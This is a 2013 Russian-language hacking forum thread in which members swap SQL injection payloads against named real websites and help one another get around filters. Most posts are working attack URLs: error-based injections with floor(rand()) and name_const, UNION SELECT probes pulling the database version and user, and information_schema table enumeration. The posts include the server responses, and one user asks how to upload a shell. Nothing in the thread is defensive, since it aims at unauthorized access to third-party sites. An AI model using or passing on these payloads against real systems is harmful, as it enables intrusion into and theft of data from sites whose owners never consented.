10.10.2013, 10:39
|
|
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами:
7504886
Репутация:
0
|
|
Сообщение от wacky
В том, что твои "плюсы" отправляются напрямую в субд.
Спасибо, первый раз с такой проблемой столкнулся!
А почему так происходит?
|
|
|
10.10.2013, 13:48
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Код:
http://elc.in.ua/study.php?id=8'
Перекручивает всё .. зараза! |
|
|
|
10.10.2013, 14:16
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от Unknowhacker
Код:
http://elc.in.ua/study.php?id=8'
Перекручивает всё .. зараза! Тут фильтр на наличие самого слова Select в запросе.
http://elc.in.ua/study.php?id=8+and+1=1+group+by+3+--+
Ковыряю.
|
|
|
|
10.10.2013, 14:25
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от Unknowhacker
Код:
http://elc.in.ua/study.php?id=8'
Перекручивает всё .. зараза! http://elc.in.ua/study.php?id=8+or(1)group+by(concat(version(),0x00 ,floor(rand(0)*2)))having(min(0)or(1))
|
|
|
|
10.10.2013, 14:31
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Сообщение от Expl0ited
http://elc.in.ua/study.php?id=8+or(1)group+by(concat(version(),0x00 ,floor(rand(0)*2)))having(min(0)or(1))
Thx! Ну как я и ожидал, что это Blind. Мужики, а эти можете глянуть
Код:
http://www.sport-trade.ru/out.php?id=9%27+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
http://www.mebi.us/out.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
|
|
|
|
10.10.2013, 14:49
|
|
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами:
7504886
Репутация:
0
|
|
Сообщение от Unknowhacker
Код:
http://elc.in.ua/study.php?id=8'
Перекручивает всё .. зараза! http://elc.in.ua/study.php?id=8%20and(select%201%20from(select%20co unt(*),concat((select%20table_name%20from%20inform ation_schema.tables%20limit%2040,1),floor(rand(0)* 2))x%20from%20information_schema.tables%20group%20 by%20x)a)=1
не могу дальше, ели грузит сайт! походу все накинулись со сканерами)
|
|
|
|
10.10.2013, 14:55
|
|
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами:
7690646
Репутация:
0
|
|
В общем есть страничка.. boom.php?page=1&subcat= на который с ' выдает ошибку
CALL failed: (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',0,5)' at line 1
Ничего не фильтрует наверно), как можно залить шелл или получить таблицы? Киньте пример мб..
|
|
|
|
10.10.2013, 15:06
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от Unknowhacker
Thx! Ну как я и ожидал, что это Blind. Мужики, а эти можете глянуть
Код:
http://www.sport-trade.ru/out.php?id=9%27+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
http://www.mebi.us/out.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
www.mebi.us/out.php?id=5 +and+mid(version(),1,1)=5
upd
Второй случай более интересен:
www.sport-trade.ru/out.php?id=-9' +union+select+1,2,3,4,5,6,7,8,9,version(),11+--+
Смотрим заголовок ответа сервера:
HTTP/1.1 302 Moved Temporarily
Servernginx/1.1.5
DateThu,10 Oct 2013 10:31:04 GMT
Content-Type text/ng
Transfer-Encoding chunked
Connectionkeep-alive
X-Powered-By PHP/5.2.17
location/out.php?id= 5.1.70-cll
Ну или смотри адресную строку.
|
|
|
|
10.10.2013, 15:36
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Сообщение от Unknowhacker
Thx! Ну как я и ожидал, что это Blind. Мужики, а эти можете глянуть
Код:
http://www.sport-trade.ru/out.php?id=9%27+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
http://www.mebi.us/out.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
http://www.sport-trade.ru/out.php?key=cat&a=item&item_id=7147%27%20UNION%20S ELECT%201,2,3,4,5,6,7,user%28%29,9,10,11,12,13,14, 15,16,17+--+
http://www.mebi.us/out.php?id=9&did=311%20UNION%20SELECT%201,2,3,4,5, 6,7,8,9,10,user%28%29,12,13,14,15,16+--+
|
|
|
|
10.10.2013, 22:58
|
|
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами:
7504886
Репутация:
0
|
|
отправляю
'and(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and'
получаю:
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42S21]: Column already exists: 1060 Duplicate column name '5.5.33-log'
отправляю:
'and(select%201%20from(select%20count(*),concat((s elect%20table_name%20from%20information_schema.tab les%20limit%2010,1),floor(rand(0)*2))x%20from%20in formation_schema.tables%20group%20by%20x)a)and'
получаю:
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%201%20from(select%20count(*),concat((select%20ta ble_name%20from%20information_s' at line 3
выше подсказывали с "+" убрал, смог решить проблему. Тут хз что делать...если можно опишите подробно из-за чего возникает такая проблема с запросом!
Спасибо.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
